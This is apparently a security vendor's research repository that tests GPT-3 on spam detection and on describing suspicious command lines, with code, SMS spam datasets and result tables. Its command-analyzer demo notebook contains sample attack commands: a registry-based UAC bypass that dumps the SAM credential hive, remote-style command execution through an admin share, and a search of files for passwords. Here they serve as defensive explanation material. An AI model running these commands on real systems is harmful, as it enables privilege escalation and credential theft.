├── requirements.txt ├── spam_detector ├── spam_data │ ├── results_mean_f1_plot.pdf │ └── experiment_1 │ │ ├── results_f1_plot.pdf │ │ ├── results_gpt3_finetune.csv │ │ ├── results_gpt3_fewshot.csv │ │ ├── train_2.csv │ │ ├── results_randomforest.csv │ │ ├── results_logisticregression.csv │ │ ├── train_8.csv │ │ ├── train_32.csv │ │ ├── test.csv │ │ └── train_512.csv ├── README.md ├── spam_demo.ipynb ├── sklearn_models.py ├── gpt3_models.py └── spam_detector.py ├── command_analyzer ├── cmd_data │ ├── data_cmd_tag_and_gold_reference_desc.json.zip │ └── results_data_cmd_tag_and_gold_reference_desc.json_scores.csv ├── README.md ├── command_demo.ipynb ├── similarity.py ├── prompt_data.py └── command_analyzer.py ├── README.md └── LICENSE /requirements.txt: -------------------------------------------------------------------------------- 1 | numpy==1.19.4 2 | pandas==1.3.3 3 | scikit-learn==0.20.3 4 | nltk==3.4 5 | matplotlib==3.5.1 6 | openai==0.20.0 -------------------------------------------------------------------------------- /spam_detector/spam_data/results_mean_f1_plot.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sophos/gpt3-and-cybersecurity/HEAD/spam_detector/spam_data/results_mean_f1_plot.pdf -------------------------------------------------------------------------------- /spam_detector/spam_data/experiment_1/results_f1_plot.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sophos/gpt3-and-cybersecurity/HEAD/spam_detector/spam_data/experiment_1/results_f1_plot.pdf -------------------------------------------------------------------------------- /command_analyzer/cmd_data/data_cmd_tag_and_gold_reference_desc.json.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sophos/gpt3-and-cybersecurity/HEAD/command_analyzer/cmd_data/data_cmd_tag_and_gold_reference_desc.json.zip -------------------------------------------------------------------------------- /spam_detector/spam_data/experiment_1/results_gpt3_finetune.csv: -------------------------------------------------------------------------------- 1 | train_size,test_precision,test_recall,test_f1-score,test_support 2 | 512,0.9926339285714285,0.9921875,0.9922847939851616,256 3 | 1024,1.0,1.0,1.0,256 4 | -------------------------------------------------------------------------------- /spam_detector/spam_data/experiment_1/results_gpt3_fewshot.csv: -------------------------------------------------------------------------------- 1 | train_size,test_precision,test_recall,test_f1-score,test_support 2 | 2,0.9446328364624965,0.9140625,0.9220379203515667,256 3 | 8,0.9773846557853911,0.9765625,0.9768543819554849,256 4 | 32,0.9801682692307693,0.9765625,0.9773792613636364,256 5 | -------------------------------------------------------------------------------- /spam_detector/spam_data/experiment_1/train_2.csv: -------------------------------------------------------------------------------- 1 | label text 2 | Ham Am on the uworld site. Am i buying the qbank only or am i buying it with the self assessment also? 3 | Spam Free-message: Jamster!Get the crazy frog sound now! For poly text MAD1, for real text MAD2 to 88888. 6 crazy sounds for just 3 GBP/week! 16+only! T&C's apply 4 | -------------------------------------------------------------------------------- /spam_detector/spam_data/experiment_1/results_randomforest.csv: -------------------------------------------------------------------------------- 1 | train_size,test_precision,test_recall,test_f1-score,test_support 2 | 2,0.890686274509804,0.875,0.8203605710066454,256 3 | 8,0.8925623739919355,0.89453125,0.8651752077831287,256 4 | 32,0.8260624562324931,0.85546875,0.8365655304963634,256 5 | 512,0.9723597935267857,0.97265625,0.9724764993116503,256 6 | 1024,0.9723597935267857,0.97265625,0.9724764993116503,256 7 | -------------------------------------------------------------------------------- /command_analyzer/cmd_data/results_data_cmd_tag_and_gold_reference_desc.json_scores.csv: -------------------------------------------------------------------------------- 1 | ,ngram_bleu_generated_description_score,ngram_bleu_baseline_description_score,semantic_similarity_generated_description_score,semantic_similarity_baseline_description_score 2 | mean,0.20269268573332166,0.18891764397772917,0.9193342014745949,0.9046513387951954 3 | std,0.10771449055627129,0.10937139147679167,0.02980726068908328,0.04784594717568072 4 | -------------------------------------------------------------------------------- /spam_detector/spam_data/experiment_1/results_logisticregression.csv: -------------------------------------------------------------------------------- 1 | train_size,test_precision,test_recall,test_f1-score,test_support 2 | 2,0.8352011308909528,0.6953125,0.7423407521724168,256 3 | 8,0.8814179345275345,0.80078125,0.8268168000650431,256 4 | 32,0.9171266417572463,0.83203125,0.8551778036153037,256 5 | 512,0.9608743134355384,0.95703125,0.9583006471367891,256 6 | 1024,0.9682624260622887,0.96484375,0.9658823476573728,256 7 | -------------------------------------------------------------------------------- /command_analyzer/README.md: -------------------------------------------------------------------------------- 1 | # Command analyzer 2 | 3 | Invoke the following command to translate a command line into a natural language description. 4 | 5 | ``` 6 | python command_analyzer.py --cmd="command line" --tags=="comma seperated tags" 7 | ``` 8 | 9 |
10 | Invoke the following command to evaluate our back-translation approaches. 11 | 12 | Unzip the cmd_data/results_data_cmd_tag_and_gold_reference_desc.json.zip file with a password which is this repository name. 13 | 14 | ``` 15 | python command_analyzer.py --run_type=evaluate_approaches --path_output_json="cmd_data/results_data_cmd_tag_and_gold_reference_desc.json" --path_input_json="cmd_data/data_cmd_tag_and_gold_reference_desc.json" 16 | ``` 17 | 18 |
19 | Demo examples are available in the [notebook](https://github.com/sophos/gpt3-and-cybersecurity/blob/main/command_analyzer/command_demo.ipynb). 20 | 21 | # Dataset 22 | 23 | cmd_data folder provides a dataset which includes command lines, tags and reference descriptions. 24 | -------------------------------------------------------------------------------- /spam_detector/README.md: -------------------------------------------------------------------------------- 1 | # Spam detector 2 | 3 | Invoke the following command to identify a message as spam or ham. 4 | 5 | ``` 6 | python spam_detector.py --message="test message" 7 | ``` 8 | 9 | The above command generates a prompt using two in-context samples from [a training dataset](./spam_data/experiment_1/train_2.csv). The default training file can be changed with its --path_train_data option. 10 | 11 |
12 | 13 | Invoke the following command to evaluate spam detection approaches which include traditional ML models and novel GPT-3 models. 14 | 15 | ``` 16 | python spam_detector.py --run_type=evaluate_approaches --path_data_folder=spam_data --num_experiments=5 17 | ``` 18 | 19 |
20 | Demo examples are available in the [notebook](https://github.com/sophos/gpt3-and-cybersecurity/blob/main/spam_detector/spam_demo.ipynb). 21 | 22 | # Spam dataset 23 | 24 | spam_data folder provides training and test datasets which were randomly sampled from a spam datast, The [spam data](./spam_data/SMSSpamCollection) is from [UCI SMS Spam collection data set](https://archive.ics.uci.edu/ml/datasets/sms+spam+collection). 25 | -------------------------------------------------------------------------------- /spam_detector/spam_data/experiment_1/train_8.csv: -------------------------------------------------------------------------------- 1 | label text 2 | Spam Want to funk up ur fone with a weekly new tone reply TONES2U 2 this text. www.ringtones.co.uk, the original n best. Tones 3GBP network operator rates apply 3 | Ham Wat makes some people dearer is not just de happiness dat u feel when u meet them but de pain u feel when u miss dem!!! 4 | Spam CDs 4u: Congratulations ur awarded £500 of CD gift vouchers or £125 gift guaranteed & Freeentry 2 £100 wkly draw xt MUSIC to 87066 TnCs www.ldew.com1win150ppmx3age16 5 | Ham For me the love should start with attraction.i should feel that I need her every time around me.she should be the first thing which comes in my thoughts.I would start the day and end it with her.she s 6 | Ham Just sent it. So what type of food do you like? 7 | Spam Free-message: Jamster!Get the crazy frog sound now! For poly text MAD1, for real text MAD2 to 88888. 6 crazy sounds for just 3 GBP/week! 16+only! T&C's apply 8 | Spam SplashMobile: Choose from 1000s of gr8 tones each wk! This is a subscrition service with weekly tones costing 300p. U have one credit - kick back and ENJOY 9 | Ham Am on the uworld site. Am i buying the qbank only or am i buying it with the self assessment also? 10 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Sophos AI GPT-3 for Cybersecurity Repository 2 | 3 | A key lesson of recent deep learning successes is that as we scale neural networks, they get better, and sometimes in game-changing ways. 4 | This repo provides two applications which demonstrate how GPT-3 opens new vistas for cybersecurity. 5 | 6 | ## How do I get started? 7 | 8 | There are two use cases for spam detection and command analysis. 9 | As the code in this repo uses OpenAI API, set the OPENAI_API_KEY enviroment variable as your api key. 10 | Refer to the OpenAI documentation in https://beta.openai.com/docs/introduction. 11 | 12 | ### Spam detector 13 | Spam detector demonstrates how to identify spam messages using GPT-3 few-shot learning or fine-tuning. 14 | 15 | Change directory to spam_detector folder and follow the [instructions](./spam_detector/README.md). 16 | 17 | 18 | ### Command analyzer 19 | Command analyzer shows how to analyzer complex command lines using GPT-3 few-shot learning. 20 | 21 | Change directory to command_analyzer folder and follow the [instructions](./command_analyzer/README.md). 22 | 23 | 24 | ## How do I cite GPT-3 for Cybersecurity? 25 | 26 | *Questions, ideas, feedback appreciated, please email younghoo.lee@sophos.com* 27 | 28 | @misc{Lee2022, 29 | author = {Lee, Younghoo}, 30 | title = {GPT-3 for Cybersecurity}, 31 | year = {2022}, 32 | publisher = {GitHub}, 33 | journal = {GitHub repository}, 34 | howpublished = {\url{https://github.com/sophos-ai/gpt3-cybersecurity/}} 35 | } 36 | -------------------------------------------------------------------------------- /spam_detector/spam_demo.ipynb: -------------------------------------------------------------------------------- 1 | { 2 | "cells": [ 3 | { 4 | "cell_type": "code", 5 | "execution_count": 1, 6 | "metadata": {}, 7 | "outputs": [], 8 | "source": [ 9 | "import os\n", 10 | "import logging\n", 11 | "\n", 12 | "os.environ[\"OPENAI_API_KEY\"] = \"YOUR_API_KEY\"\n", 13 | "\n", 14 | "from spam_detector import classify_message\n", 15 | "\n", 16 | "logging.disable(logging.CRITICAL)\n", 17 | "\n", 18 | "def test_message(message, label):\n", 19 | " model_label = classify_message(\n", 20 | " message, \n", 21 | " path_train_data=\"spam_data/experiment_1/train_2.csv\", \n", 22 | " num_samples_in_prompt=2\n", 23 | " )\n", 24 | " print(\"label:{}, model_label:{}\".format(label, model_label))\n" 25 | ] 26 | }, 27 | { 28 | "cell_type": "code", 29 | "execution_count": null, 30 | "metadata": {}, 31 | "outputs": [], 32 | "source": [ 33 | "#update the \"YOUR_API_KEY\" with your key value." 34 | ] 35 | }, 36 | { 37 | "cell_type": "code", 38 | "execution_count": 2, 39 | "metadata": {}, 40 | "outputs": [ 41 | { 42 | "name": "stdout", 43 | "output_type": "stream", 44 | "text": [ 45 | "label:Spam, model_label:Spam\n" 46 | ] 47 | } 48 | ], 49 | "source": [ 50 | "message = \"Reply with your name and address and YOU WILL RECEIVE BY POST a weeks completely free accommodation at various global locations www.phb1.com ph:08700435505150p\"\n", 51 | "\n", 52 | "test_message(message, label=\"Spam\")" 53 | ] 54 | }, 55 | { 56 | "cell_type": "code", 57 | "execution_count": 3, 58 | "metadata": {}, 59 | "outputs": [ 60 | { 61 | "name": "stdout", 62 | "output_type": "stream", 63 | "text": [ 64 | "label:Spam, model_label:Spam\n" 65 | ] 66 | } 67 | ], 68 | "source": [ 69 | "message = \"Bloomberg -Message center +447797706009 Why wait? Apply for your future http://careers. bloomberg.com\"\n", 70 | "\n", 71 | "test_message(message, label=\"Spam\")" 72 | ] 73 | }, 74 | { 75 | "cell_type": "code", 76 | "execution_count": 4, 77 | "metadata": {}, 78 | "outputs": [ 79 | { 80 | "name": "stdout", 81 | "output_type": "stream", 82 | "text": [ 83 | "label:Ham, model_label:Ham\n" 84 | ] 85 | } 86 | ], 87 | "source": [ 88 | "message = \"And you! Will expect you whenever you text! Hope all goes well tomo\"\n", 89 | "\n", 90 | "test_message(message, label=\"Ham\")" 91 | ] 92 | }, 93 | { 94 | "cell_type": "code", 95 | "execution_count": 5, 96 | "metadata": {}, 97 | "outputs": [ 98 | { 99 | "name": "stdout", 100 | "output_type": "stream", 101 | "text": [ 102 | "label:Ham, model_label:Ham\n" 103 | ] 104 | } 105 | ], 106 | "source": [ 107 | "message = \"I'm okay. Chasing the dream. What's good. What are you doing next.\"\n", 108 | "\n", 109 | "test_message(message, label=\"Ham\")" 110 | ] 111 | } 112 | ], 113 | "metadata": { 114 | "kernelspec": { 115 | "display_name": "Python 3.7.3 ('py37')", 116 | "language": "python", 117 | "name": "python3" 118 | }, 119 | "language_info": { 120 | "codemirror_mode": { 121 | "name": "ipython", 122 | "version": 3 123 | }, 124 | "file_extension": ".py", 125 | "mimetype": "text/x-python", 126 | "name": "python", 127 | "nbconvert_exporter": "python", 128 | "pygments_lexer": "ipython3", 129 | "version": "3.7.3" 130 | }, 131 | "orig_nbformat": 4, 132 | "vscode": { 133 | "interpreter": { 134 | "hash": "76a25e87fb8c87bd2343da81e5596777f4c7870efa99cccebacc9b427c0a0b42" 135 | } 136 | } 137 | }, 138 | "nbformat": 4, 139 | "nbformat_minor": 2 140 | } 141 | -------------------------------------------------------------------------------- /spam_detector/sklearn_models.py: -------------------------------------------------------------------------------- 1 | import pandas as pd 2 | import logging 3 | from collections import Counter 4 | from sklearn.feature_extraction.text import TfidfVectorizer 5 | from sklearn.ensemble import RandomForestClassifier 6 | from sklearn.linear_model import LogisticRegression 7 | from sklearn.metrics import classification_report 8 | 9 | 10 | logging.basicConfig(format="%(asctime)s %(message)s", 11 | datefmt="%Y-%m-%d %H:%M:%S", level=logging.INFO) 12 | logger = logging.getLogger(__name__) 13 | 14 | 15 | def extract_features( 16 | df, 17 | column_text="text", 18 | column_label="label", 19 | positive_label="Spam", 20 | max_features=1000, 21 | vectorizer=None, 22 | ): 23 | """ 24 | extract ML features. 25 | :param df: the data frame for input data 26 | :param column_text: the column for text 27 | :param column_label: the column for label 28 | :param positive_label: the value for positive label 29 | :param max_features: the max number of features 30 | :param vectorizer: vectorizer for test data 31 | """ 32 | if vectorizer is None: 33 | vectorizer = TfidfVectorizer(max_features=max_features) 34 | X = vectorizer.fit_transform(df[column_text]) 35 | else: 36 | X = vectorizer.transform(df[column_text]) 37 | y = df[column_label] == positive_label 38 | return X, y, vectorizer 39 | 40 | 41 | def train_sk_model( 42 | X_train, 43 | X_test, 44 | y_train, 45 | y_test, 46 | model_name="RandomForest" 47 | ): 48 | if model_name == "RandomForest": 49 | model = RandomForestClassifier() 50 | elif model_name == "LogisticRegression": 51 | model = LogisticRegression() 52 | model.fit(X_train, y_train) 53 | 54 | y_pred = model.predict(X_test) 55 | return classification_report(y_test, y_pred, output_dict=True) 56 | 57 | 58 | def evaluate_sklearn_model( 59 | path_train_data, 60 | path_test_data, 61 | model_name="RandomForest", 62 | max_features=1000, 63 | column_text="text", 64 | column_label="label", 65 | positive_label="Spam" 66 | ): 67 | """ 68 | evaluate sklearn models with training and test datasets. 69 | :param path_train_data: file path for training dataset 70 | :param path_test_data: file path for test dataset 71 | :param model_name: model name 72 | :param max_features: max number of ML features 73 | :param column_text: the column for text 74 | :param column_label: the column for label 75 | :param positive_label: the value for positive label 76 | """ 77 | df_train = pd.read_csv(path_train_data, sep="\t") 78 | logger.info("path_train_data:{}, df_train.shape:{}".format( 79 | path_train_data, df_train.shape)) 80 | 81 | X_train, y_train, vectorizer = extract_features( 82 | df_train, max_features=max_features, 83 | column_text=column_text, column_label=column_label, 84 | positive_label=positive_label) 85 | logger.info("X_train.shape:{}, y_train.shape:{}".format( 86 | X_train.shape, y_train.shape)) 87 | logger.info("y_train.label.count:{}".format(Counter(y_train))) 88 | 89 | df_test = pd.read_csv(path_test_data, sep="\t") 90 | logger.info("path_test_data:{}, df_test.shape:{}".format( 91 | path_test_data, df_test.shape)) 92 | 93 | X_test, y_test, _vectorizer = extract_features( 94 | df_test, max_features=max_features, vectorizer=vectorizer, 95 | column_text=column_text, column_label=column_label, 96 | positive_label=positive_label) 97 | logger.info("X_test.shape:{}, y_test.shape:{}".format( 98 | X_test.shape, y_test.shape)) 99 | logger.info("y_test.label.count:{}".format(Counter(y_test))) 100 | 101 | return train_sk_model(X_train, X_test, y_train, y_test, model_name=model_name) 102 | -------------------------------------------------------------------------------- /spam_detector/spam_data/experiment_1/train_32.csv: -------------------------------------------------------------------------------- 1 | label text 2 | Ham Am in gobi arts college 3 | Spam Congrats! Nokia 3650 video camera phone is your Call 09066382422 Calls cost 150ppm Ave call 3mins vary from mobiles 16+ Close 300603 post BCM4284 Ldn WC1N3XX 4 | Ham Sorry * was at the grocers. 5 | Ham Its ok..come to my home it vl nice to meet and v can chat.. 6 | Ham Rose needs water, season needs change, poet needs imagination..My phone needs ur sms and i need ur lovely frndship forever.... 7 | Spam 83039 62735=£450 UK Break AccommodationVouchers terms & conditions apply. 2 claim you mustprovide your claim number which is 15541 8 | Ham Did he say how fantastic I am by any chance, or anything need a bigger life lift as losing the will 2 live, do you think I would be the first person 2 die from N V Q? 9 | Ham How's my loverboy doing ? What does he do that keeps him from coming to his Queen, hmmm ? Doesn't he ache to speak to me ? Miss me desparately ? 10 | Spam You will be receiving this week's Triple Echo ringtone shortly. Enjoy it! 11 | Ham Solve d Case : A Man Was Found Murdered On <DECIMAL> . <#> AfterNoon. 1,His wife called Police. 2,Police questioned everyone. 3,Wife: Sir,I was sleeping, when the murder took place. 4.Co 12 | Spam 18 days to Euro2004 kickoff! U will be kept informed of all the latest news and results daily. Unsubscribe send GET EURO STOP to 83222. 13 | Spam SplashMobile: Choose from 1000s of gr8 tones each wk! This is a subscrition service with weekly tones costing 300p. U have one credit - kick back and ENJOY 14 | Spam Congratulations ur awarded either a yrs supply of CDs from Virgin Records or a Mystery Gift GUARANTEED Call 09061104283 Ts&Cs www.smsco.net £1.50pm approx 3mins 15 | Spam Bored of speed dating? Try SPEEDCHAT, txt SPEEDCHAT to 80155, if you don't like em txt SWAP and get a new chatter! Chat80155 POBox36504W45WQ 150p/msg rcd 16 16 | Ham Just sent it. So what type of food do you like? 17 | Spam ree entry in 2 a weekly comp for a chance to win an ipod. Txt POD to 80182 to get entry (std txt rate) T&C's apply 08452810073 for details 18+ 18 | Spam Want to funk up ur fone with a weekly new tone reply TONES2U 2 this text. www.ringtones.co.uk, the original n best. Tones 3GBP network operator rates apply 19 | Ham Wat makes some people dearer is not just de happiness dat u feel when u meet them but de pain u feel when u miss dem!!! 20 | Ham Mm you ask him to come its enough :-) 21 | Spam Your 2004 account for 07XXXXXXXXX shows 786 unredeemed points. To claim call 08719181259 Identifier code: XXXXX Expires 26.03.05 22 | Ham Today i'm not workin but not free oso... Gee... Thgt u workin at ur fren's shop ? 23 | Spam Free-message: Jamster!Get the crazy frog sound now! For poly text MAD1, for real text MAD2 to 88888. 6 crazy sounds for just 3 GBP/week! 16+only! T&C's apply 24 | Ham Thanx. Yup we coming back on sun. Finish dinner going back 2 hotel now. Time flies, we're tog 4 exactly a mth today. Hope we'll haf many more mths to come... 25 | Spam 88066 FROM 88066 LOST 3POUND HELP 26 | Ham I need... Coz i never go before 27 | Spam Hi, this is Mandy Sullivan calling from HOTMIX FM...you are chosen to receive £5000.00 in our Easter Prize draw.....Please telephone 09041940223 to claim before 29/03/05 or your prize will be transfer 28 | Spam todays vodafone numbers ending with 0089(my last four digits) are selected to received a £350 award. If your number matches please call 09063442151 to claim your £350 award 29 | Ham Am on the uworld site. Am i buying the qbank only or am i buying it with the self assessment also? 30 | Ham For me the love should start with attraction.i should feel that I need her every time around me.she should be the first thing which comes in my thoughts.I would start the day and end it with her.she s 31 | Ham Or I guess <#> min 32 | Spam CDs 4u: Congratulations ur awarded £500 of CD gift vouchers or £125 gift guaranteed & Freeentry 2 £100 wkly draw xt MUSIC to 87066 TnCs www.ldew.com1win150ppmx3age16 33 | Spam Dear Matthew please call 09063440451 from a landline, your complimentary 4*Lux Tenerife holiday or £1000 CASH await collection. ppm150 SAE T&Cs Box334 SK38XH. 34 | -------------------------------------------------------------------------------- /command_analyzer/command_demo.ipynb: -------------------------------------------------------------------------------- 1 | { 2 | "cells": [ 3 | { 4 | "cell_type": "code", 5 | "execution_count": 1, 6 | "metadata": {}, 7 | "outputs": [], 8 | "source": [ 9 | "import os\n", 10 | "import logging\n", 11 | "\n", 12 | "os.environ[\"OPENAI_API_KEY\"] = \"YOUR_API_KEY\"\n", 13 | "\n", 14 | "from command_analyzer import generate_description\n", 15 | "\n", 16 | "logging.disable(logging.CRITICAL)\n", 17 | "\n", 18 | "def command_to_description(command, tags):\n", 19 | " description, baseline_description, candidates = generate_description(command, tags)\n", 20 | " print(\"description:\\n{}\".format(description))\n", 21 | " print(\"baseline_description:\\n{}\".format(baseline_description)) \n" 22 | ] 23 | }, 24 | { 25 | "cell_type": "code", 26 | "execution_count": 2, 27 | "metadata": {}, 28 | "outputs": [], 29 | "source": [ 30 | "#update the \"YOUR_API_KEY\" with your key value." 31 | ] 32 | }, 33 | { 34 | "cell_type": "code", 35 | "execution_count": 3, 36 | "metadata": {}, 37 | "outputs": [ 38 | { 39 | "name": "stdout", 40 | "output_type": "stream", 41 | "text": [ 42 | "description:\n", 43 | "The command will create a registry value \"command\" under the registry key \"hkcu\\software\\classes\\ms-settings\\shell\\open\" and set its default value to \"reg.exe save hklm\\sam C:\\Users\\Pcs\\AppData\\Local\\Temp\\sam.save\". This default value will then be executed when the user clicks on the Windows \"Settings\" icon. The command will add a value under the \"reg.exe\" key in the \"open\\command\" directory of the \"ms-settings\" key in the \"HKCU\" hive. The value data is \"reg.exe save hklm\\sam C:\\Users\\Pcs\\AppData\\Local\\Temp\\sam.save\".\n", 44 | "baseline_description:\n", 45 | "The command will attempt to dump the SAM registry hive to the specified path.\n" 46 | ] 47 | } 48 | ], 49 | "source": [ 50 | "command = \"reg.exe add hkcu\\\\software\\\\classes\\\\ms-settings\\\\shell\\\\open\\\\command /ve /d \\\"reg.exe save hklm\\\\sam C:\\\\Users\\\\Pcs\\\\AppData\\\\Local\\\\Temp\\\\sam.save\\\" /f\"\n", 51 | "tags = \"win_pc_reg_dump_sam,win_pc_suspicious_reg_open_command\"\n", 52 | "command_to_description(command, tags)\n" 53 | ] 54 | }, 55 | { 56 | "cell_type": "code", 57 | "execution_count": 4, 58 | "metadata": {}, 59 | "outputs": [ 60 | { 61 | "name": "stdout", 62 | "output_type": "stream", 63 | "text": [ 64 | "description:\n", 65 | "The command will echo the \"dir\" command to a file called \"execute.bat\", write the command to the \"execute.bat\" file, and then execute the \"execute.bat\" file. This command will list the contents of the directory \"C:\\Users\\admin\\OneDrive ADMINISTRATORS INC\" and write the output to \"\\\\127.0.0.1\\C$\\__output\". The \"dir\" command will be executed as the \"Local System\" account.\n", 66 | "baseline_description:\n", 67 | "The command will list the contents of the \"C:\\Users\\admin\\OneDrive ADMINISTRATORS INC\" directory and save the output to \"C:\\__output\". It will be executed as the LocalSystem account.\n" 68 | ] 69 | } 70 | ], 71 | "source": [ 72 | "command = \"C:\\\\WINDOWS\\\\system32\\\\cmd.exe /Q /c echo dir \\\"C:\\\\Users\\\\admin\\\\OneDrive ADMINISTRATORS INC\\\" ^> \\\\\\\\127.0.0.1\\\\C$\\\\__output 2^>^&1 > C:\\\\WINDOWS\\\\TEMP\\\\execute.bat & C:\\\\WINDOWS\\\\system32\\\\cmd.exe /Q /c C:\\\\WINDOWS\\\\TEMP\\\\execute.bat & del C:\\\\WINDOWS\\\\TEMP\\\\execute.bat\"\n", 73 | "tags = \"win_local_system_owner_account_discovery\"\n", 74 | "command_to_description(command, tags)" 75 | ] 76 | }, 77 | { 78 | "cell_type": "code", 79 | "execution_count": 5, 80 | "metadata": {}, 81 | "outputs": [ 82 | { 83 | "name": "stdout", 84 | "output_type": "stream", 85 | "text": [ 86 | "description:\n", 87 | "The command will recursively list all files in the \"C:\\Users\\Pcs\\Desktop\" directory and all subdirectories, and will search the output for files containing the word \"password\".\n", 88 | "baseline_description:\n", 89 | "The command will list all files and directories on the target machine and pipe the output to a search for the string \"password\".\n" 90 | ] 91 | } 92 | ], 93 | "source": [ 94 | "command = \"\\\"cmd.exe\\\" dir /b /s \\\"C:\\\\Users\\\\Pcs\\\\Desktop\\\\*.*\\\" | findstr /i \\\"password\\\"\"\n", 95 | "tags = \"win_pc_suspicious_dir,win_suspicious_findstr\"\n", 96 | "command_to_description(command, tags)" 97 | ] 98 | } 99 | ], 100 | "metadata": { 101 | "kernelspec": { 102 | "display_name": "Python 3.7.3 ('py37')", 103 | "language": "python", 104 | "name": "python3" 105 | }, 106 | "language_info": { 107 | "codemirror_mode": { 108 | "name": "ipython", 109 | "version": 3 110 | }, 111 | "file_extension": ".py", 112 | "mimetype": "text/x-python", 113 | "name": "python", 114 | "nbconvert_exporter": "python", 115 | "pygments_lexer": "ipython3", 116 | "version": "3.7.3" 117 | }, 118 | "orig_nbformat": 4, 119 | "vscode": { 120 | "interpreter": { 121 | "hash": "76a25e87fb8c87bd2343da81e5596777f4c7870efa99cccebacc9b427c0a0b42" 122 | } 123 | } 124 | }, 125 | "nbformat": 4, 126 | "nbformat_minor": 2 127 | } 128 | -------------------------------------------------------------------------------- /command_analyzer/similarity.py: -------------------------------------------------------------------------------- 1 | import numpy as np 2 | import logging 3 | from nltk.translate.bleu_score import sentence_bleu 4 | from openai.embeddings_utils import get_embeddings 5 | 6 | 7 | logging.basicConfig(format="%(asctime)s %(message)s", 8 | datefmt='%Y-%m-%d %H:%M:%S', level=logging.INFO) 9 | logger = logging.getLogger(__name__) 10 | 11 | 12 | def get_embedding_similarity_score_list( 13 | cmd, 14 | tags, 15 | items, 16 | max_cmd_len=200, 17 | weight_desc_score=0.3, 18 | weight_tags_score=0.2, 19 | engine="text-similarity-babbage-001" 20 | ): 21 | """ 22 | returns a weighted score from cosine similarity scores. 23 | :param cmd: command line data 24 | :param tags: tags data 25 | :param items: contains a list of (desc, generated_cmd) 26 | :param max_cmd_len: max length of command line data 27 | :param weight_desc_score: the weight for description score 28 | :param weight_tags_score: the weight for tags score 29 | :param engine: engine for similarity score 30 | """ 31 | code_items = [cmd[:max_cmd_len]] + [item[1] for item in items] 32 | if weight_tags_score>0: 33 | code_items += [tags] 34 | code_matrix = get_embeddings(code_items, engine=engine) 35 | if weight_tags_score>0: 36 | tags_emb = code_matrix[-1] 37 | 38 | if weight_desc_score>0: 39 | desc_items = [item[0] for item in items] 40 | desc_matrix = get_embeddings(desc_items, engine=engine) 41 | 42 | reference_code_emb = code_matrix[0] 43 | score_list = [] 44 | for ix in range(len(items)): 45 | desc, generated_cmd = items[ix] 46 | #get a cosine similarity score between two embeddings vectors 47 | code_score = np.dot(reference_code_emb, code_matrix[1+ix]) 48 | #get a weighted score from 3 scores 49 | if weight_desc_score>0 and weight_tags_score>0: 50 | desc_score = np.dot(reference_code_emb, desc_matrix[ix]) 51 | tags_score = np.dot(tags_emb, desc_matrix[ix]) 52 | score = (1-weight_desc_score-weight_tags_score) * code_score + weight_desc_score * desc_score + weight_tags_score * tags_score 53 | elif weight_desc_score>0: 54 | desc_score = np.dot(reference_code_emb, desc_matrix[ix]) 55 | tags_score = .0 56 | score = (1-weight_desc_score) * code_score + weight_desc_score * desc_score 57 | elif weight_tags_score>0: 58 | desc_score = .0 59 | tags_score = np.dot(reference_code_emb, desc_matrix[ix]) 60 | score = (1-weight_tags_score) * code_score + weight_tags_score * tags_score 61 | else: 62 | desc_score = .0 63 | tags_score = .0 64 | score = code_score 65 | logger.info("===\n{:.3f}, {:.3f}, {:.3f}, {:.3f}".format( 66 | score, code_score, desc_score, tags_score)) 67 | logger.info(desc) 68 | logger.info(generated_cmd) 69 | score_list.append((score, code_score, desc_score, tags_score, cmd, generated_cmd, desc)) 70 | return score_list 71 | 72 | 73 | def get_sorted_similarity_score_list( 74 | cmd, 75 | tags, 76 | items, 77 | engine="text-similarity-babbage-001", 78 | weight_desc_score=0.3, 79 | weight_tags_score=0.2, 80 | max_cmd_len=200 81 | ): 82 | """ 83 | return a list of description list sorted similarity scores. 84 | :param cmd: command line data 85 | :param tags: tags data 86 | :param items: contains a list of (desc, generated_cmd) 87 | :param engine: engine for similarity score 88 | :param weight_desc_score: the weight for description score 89 | :param weight_tags_score: the weight for tags score 90 | :param max_cmd_len: max length of command line data 91 | """ 92 | score_list = get_embedding_similarity_score_list( 93 | cmd, tags, items, 94 | weight_desc_score=weight_desc_score, 95 | weight_tags_score=weight_tags_score, 96 | engine=engine, max_cmd_len=max_cmd_len) 97 | 98 | return sorted(score_list, key=lambda x:x[0], reverse=True) 99 | 100 | 101 | def get_ngrams_bleu_similarity_score( 102 | reference, 103 | candidate_list 104 | ): 105 | """ 106 | returns similarity scores using sentence_bleu. 107 | :param reference: reference text 108 | :param candidate_list: a list of candidates 109 | """ 110 | score_list = [] 111 | for candidate in candidate_list: 112 | reference_tokens = [reference.split()] 113 | candidate_tokens = candidate.split() 114 | score = sentence_bleu(reference_tokens, candidate_tokens, 115 | weights=(0.5, 0.5, 0., 0.)) 116 | score_list.append(score) 117 | return score_list 118 | 119 | 120 | def get_semantic_similarity_score( 121 | reference, 122 | candidate_list, 123 | engine="text-similarity-babbage-001" 124 | ): 125 | """ 126 | return similarity scores using cosine similarity with gpt3 embeddings. 127 | :param reference: reference text 128 | :param candidate_list: a list of candidates 129 | :param engine: engine for similarity score 130 | """ 131 | items = [reference] + candidate_list 132 | embeddings_list = get_embeddings(items, engine=engine) 133 | reference_emb = embeddings_list[0] 134 | score_list = [] 135 | for candidate_embeddings in embeddings_list[1:]: 136 | #get a cosine similarity score 137 | score = np.dot(reference_emb, candidate_embeddings) 138 | score_list.append(score) 139 | return score_list 140 | -------------------------------------------------------------------------------- /command_analyzer/prompt_data.py: -------------------------------------------------------------------------------- 1 | import os 2 | import time 3 | import logging 4 | import openai 5 | 6 | 7 | openai.api_key = os.getenv("OPENAI_API_KEY") 8 | 9 | logging.getLogger("openai").setLevel(logging.ERROR) 10 | logging.basicConfig(format="%(asctime)s %(message)s", 11 | datefmt='%Y-%m-%d %H:%M:%S', level=logging.INFO) 12 | logger = logging.getLogger(__name__) 13 | 14 | 15 | STR_PREFIX_CMD = '## Command\n' 16 | STR_PREFIX_TAGS = '## Tags\n' 17 | 18 | STR_PREFIX_DESC = '## Description\nThe command' 19 | STR_PREFIX_ABOVE_DESC = '## Description\nThe above command' 20 | STR_PREFIX_BELOW_DESC = '## Description\nThe below command' 21 | 22 | STR_PREFIX_FIRST_DESC = '## Description1\nThe command' 23 | STR_PREFIX_SECOND_DESC = '## Description2\nThe command' 24 | STR_PREFIX_COMBINED_DESC = 'The Description1 and Description2 describe the 